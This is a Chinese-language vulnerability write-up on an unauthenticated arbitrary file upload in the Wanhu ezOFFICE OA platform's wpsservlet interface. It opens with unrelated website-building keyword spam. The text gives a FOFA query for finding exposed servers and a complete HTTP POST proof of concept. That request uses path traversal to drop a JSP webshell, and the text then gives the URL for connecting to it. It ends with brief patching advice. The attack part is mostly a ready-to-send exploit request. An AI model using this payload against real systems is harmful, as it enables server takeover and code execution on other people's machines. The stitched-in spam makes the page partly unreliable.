制作网站的app吗,网站悬浮广告素材,深圳网站制作公司兴田德润在哪里,中文建站模板0x01 产品简介 万户OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品#xff0c;统一的基础管理平台#xff0c;实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台#xff0c;将外网信息…0x01 产品简介 万户OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品统一的基础管理平台实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台将外网信息维护、客户服务、互动交流和日常工作紧密结合起来有效提高工作效率。
0x02 漏洞概述 万户ezOFFICE协同管理平台wpsservlet接口处存在任意文件上传漏洞未经身份认证的攻击者可以通过此漏洞上传恶意后门文件造成代码执行或服务器失陷。
0x03 复现环境
FOFAapp万户网络-ezOFFICE 0x04 漏洞复现
PoC
POST /defaultroot/wpsservlet?optionsaveNewFilenewdocId1dir../platform/portal/layout/fileType.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cache-Control: max-age0
Content-Type: multipart/form-data; boundary803e058d60f347f7b3c17fa95228eca6
Accept-Encoding: gzip--803e058d60f347f7b3c17fa95228eca6
Content-Disposition: form-data; nameNewFile; filename1.jsp马子
--803e058d60f347f7b3c17fa95228eca6--
上传马子 验证url
http://your-ip/defaultroot/platform/portal/layout/1.jsp 尝试连接 0x05 修复建议
关闭互联网暴露面或接口处设置访问权限
打补丁或升级安全版本
